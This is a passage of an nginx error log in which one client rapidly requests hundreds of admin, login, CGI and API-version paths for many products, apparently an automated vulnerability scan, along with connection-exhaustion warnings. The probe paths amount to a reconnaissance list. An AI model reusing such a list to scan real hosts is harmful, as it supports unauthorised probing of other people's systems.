"91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [warn] 345#345: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:49 [warn] 344#344: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:49 [warn] 346#346: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:49 [warn] 347#347: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:49 [alert] 345#345: *38455 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /WebApp/js/UI_String.js HTTP/1.1", upstream: "http://127.0.0.1:80/WebApp/js/UI_String.js", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 346#346: *38457 open() "/var/www/html/cgi-bin/param.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/param.cgi?get_device_conf HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 344#344: *38462 open() "/var/www/html/c/login" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /c/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 346#346: *38456 open() "/var/www/html/home.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /home.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 344#344: *38464 "/var/www/html/kylin/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /kylin/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 344#344: *38466 open() "/var/www/html/cslu/v1/core/conf" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cslu/v1/core/conf HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 347#347: *39964 open() "/var/www/html/localstart.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 347#347: *39966 open() "/var/www/html/api/v1.0/environment" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/v1.0/environment HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 347#347: *39970 open() "/var/www/html/config" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /config HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 344#344: *39975 open() "/var/www/html/pom.xml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /pom.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:50 [error] 345#345: *40056 open() "/var/www/html/default.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:50 [error] 347#347: *40058 open() "/var/www/html/build.gradle" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /build.gradle HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:50 [error] 345#345: *40061 open() "/var/www/html/CHANGELOG.txt" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /CHANGELOG.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:50 [error] 345#345: *40063 open() "/var/www/html/admin/reports/updates" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin/reports/updates HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:50 [error] 346#346: *40776 open() "/var/www/html/admin/reports/status" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin/reports/status HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:50 [error] 347#347: *41481 open() "/var/www/html/admin.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:50 [warn] 344#344: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:50 [warn] 347#347: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:50 [warn] 346#346: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:50 [alert] 347#347: 512 worker_connections are not enough +2026/01/24 01:19:50 [error] 346#346: *43209 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /css/eonweb.css HTTP/1.1", upstream: "http://127.0.0.1:80/css/eonweb.css", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:50 [alert] 347#347: 512 worker_connections are not enough +2026/01/24 01:19:50 [error] 344#344: *43234 upstream prematurely closed connection while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1", upstream: "http://127.0.0.1:80/ext-js/app/common/zld_product_spec.js", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 346#346: *43243 open() "/var/www/html/index.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 345#345: *43238 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 345#345: *43242 "/var/www/html/pandora_console/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /pandora_console/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 347#347: *43252 open() "/var/www/html/centreon/api/latest/platform/versions" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /centreon/api/latest/platform/versions HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 347#347: *43253 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 347#347: *44022 open() "/var/www/html/start.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /start.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 344#344: *44521 open() "/var/www/html/api/v3/meta" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/v3/meta HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [warn] 345#345: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:51 [warn] 344#344: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:51 [warn] 346#346: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:51 [alert] 346#346: 512 worker_connections are not enough +2026/01/24 01:19:51 [error] 344#344: *45267 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /assets/png/favicon-abe32304.png HTTP/1.1", upstream: "http://127.0.0.1:80/assets/png/favicon-abe32304.png", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 345#345: *45276 open() "/var/www/html/app/ui/login.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /app/ui/login.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 346#346: *45274 open() "/var/www/html/base.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 346#346: *45382 "/var/www/html/login/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /login/?next=/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 346#346: *46778 open() "/var/www/html/cgi-bin/luci" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 346#346: *46780 open() "/var/www/html/admin.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:51 [error] 346#346: *46784 open() "/var/www/html/Main_Login.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /Main_Login.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *47015 open() "/var/www/html/photo/webapi/query.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [warn] 345#345: 512 worker_connections are not enough, reusing connections +2026/01/24 01:19:52 [alert] 346#346: 512 worker_connections are not enough +2026/01/24 01:19:52 [error] 346#346: *49123 upstream prematurely closed connection while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /plugin/webs_model_cfg.js HTTP/1.1", upstream: "http://127.0.0.1:80/plugin/webs_model_cfg.js", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [alert] 346#346: 512 worker_connections are not enough +2026/01/24 01:19:52 [error] 347#347: *49131 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /MagicInfo/config.js HTTP/1.1", upstream: "http://127.0.0.1:80/MagicInfo/config.js", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 344#344: *49137 open() "/var/www/html/nidp/app/login" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /nidp/app/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 344#344: *49136 open() "/var/www/html/indice.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 344#344: *49143 open() "/var/www/html/about" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *49273 open() "/var/www/html/rs/application-about" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /rs/application-about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *49552 open() "/var/www/html/api/v2/hoverfly/version" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/v2/hoverfly/version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 344#344: *49586 open() "/var/www/html/ui/login.action" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /ui/login.action HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *49587 "/var/www/html/core/auth/login/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /core/auth/login/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 347#347: *49576 open() "/var/www/html/menu.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /menu.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *49925 open() "/var/www/html/main/main.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main/main.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 344#344: *50236 open() "/var/www/html/api/v1/info" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/v1/info HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 347#347: *50334 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *50332 open() "/var/www/html/login" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50624 open() "/var/www/html/home.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /home.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50657 open() "/var/www/html/api/status" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/status HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *50660 open() "/var/www/html/~login" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /~login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50661 open() "/var/www/html/mailinspector/login.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /mailinspector/login.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50662 open() "/var/www/html/agc/vicidial.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /agc/vicidial.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50663 open() "/var/www/html/config_dump" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /config_dump HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50668 open() "/var/www/html/AppsHome.do" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /AppsHome.do HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50671 open() "/var/www/html/home.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /home.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50674 open() "/var/www/html/agent/vicidial.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /agent/vicidial.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50673 open() "/var/www/html/index.do" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.do HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *50678 open() "/var/www/html/system/gwinfo" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /system/gwinfo HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50683 open() "/var/www/html/jtcgi/wte.pyc" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /jtcgi/wte.pyc HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *50679 open() "/var/www/html/openapi.json" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /openapi.json HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 345#345: *50680 open() "/var/www/html/decisioncenter-api/v1/about" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /decisioncenter-api/v1/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50687 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50690 open() "/var/www/html/nifi-api/flow/about" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /nifi-api/flow/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50692 "/var/www/html/nifi/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /nifi/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:52 [error] 346#346: *50691 open() "/var/www/html/index.lua" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.lua HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50700 open() "/var/www/html/sys/en/neoclassic/login/login" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /sys/en/neoclassic/login/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50698 open() "/var/www/html/cgi-bin/meteobridge.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/meteobridge.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 347#347: *50706 open() "/var/www/html/api-description" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api-description HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50704 open() "/var/www/html/v2" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /v2 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50699 open() "/var/www/html/info.htm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /info.htm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50702 open() "/var/www/html/base.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50709 open() "/var/www/html/management/v1/cluster/state" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /management/v1/cluster/state HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50712 open() "/var/www/html/wp-content/plugins/post-smtp/readme.txt" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/post-smtp/readme.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50714 open() "/var/www/html/monitor/index.php/auth/login" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /monitor/index.php/auth/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *50713 open() "/var/www/html/sap/bc/ui2/flp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /sap/bc/ui2/flp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 346#346: *50814 open() "/var/www/html/admin.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 344#344: *51169 open() "/var/www/html/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 346#346: *51173 open() "/var/www/html/browser/index.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /browser/index.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 344#344: *51176 open() "/var/www/html/ignite" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /ignite?cmd=version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 346#346: *51172 open() "/var/www/html/api/v2.0/systeminfo" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/v2.0/systeminfo HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *51859 open() "/var/www/html/cgi-bin/getagent.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/getagent.cgi?type=s HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 346#346: *51962 open() "/var/www/html/nmc/rss/server" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /nmc/rss/server HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *51881 open() "/var/www/html/menu.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /menu.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 344#344: *51871 open() "/var/www/html/api/v1/cluster/summary" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/v1/cluster/summary HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *51895 open() "/var/www/html/ScadaBR/login.htm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /ScadaBR/login.htm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 346#346: *52230 open() "/var/www/html/webpages/login.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /webpages/login.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 346#346: *52233 "/var/www/html/download/python/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /download/python/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 346#346: *52234 open() "/var/www/html/api/system/status" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/system/status HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *52238 open() "/var/www/html/default.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *52240 open() "/var/www/html/sms_mp/.sms_aut" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /sms_mp/.sms_aut?mplist HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *52239 open() "/var/www/html/rest/settings" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /rest/settings HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *52243 open() "/var/www/html/admin" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *52655 open() "/var/www/html/admin.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:53 [error] 345#345: *53747 open() "/var/www/html/localstart.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:54 [error] 346#346: *54495 open() "/var/www/html/home.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /home.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:54 [error] 344#344: *55257 open() "/var/www/html/localstart.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:54 [error] 344#344: *55264 open() "/var/www/html/main.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:54 [error] 344#344: *55412 open() "/var/www/html/admin.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:54 [error] 347#347: *56491 open() "/var/www/html/base.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:54 [error] 346#346: *56774 open() "/var/www/html/localstart.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:54 [error] 346#346: *56775 open() "/var/www/html/index.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:55 [error] 346#346: *56776 open() "/var/www/html/index.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:55 [error] 346#346: *56903 open() "/var/www/html/start.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /start.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:55 [error] 347#347: *57969 open() "/var/www/html/index.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:55 [error] 347#347: *58266 open() "/var/www/html/main.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:55 [error] 345#345: *58267 open() "/var/www/html/admin.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:55 [error] 345#345: *58268 open() "/var/www/html/admin.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:56 [error] 345#345: *58269 open() "/var/www/html/start.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /start.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:56 [error] 345#345: *59350 open() "/var/www/html/default.jhtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:56 [error] 344#344: *59758 open() "/var/www/html/base.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:56 [error] 344#344: *59759 open() 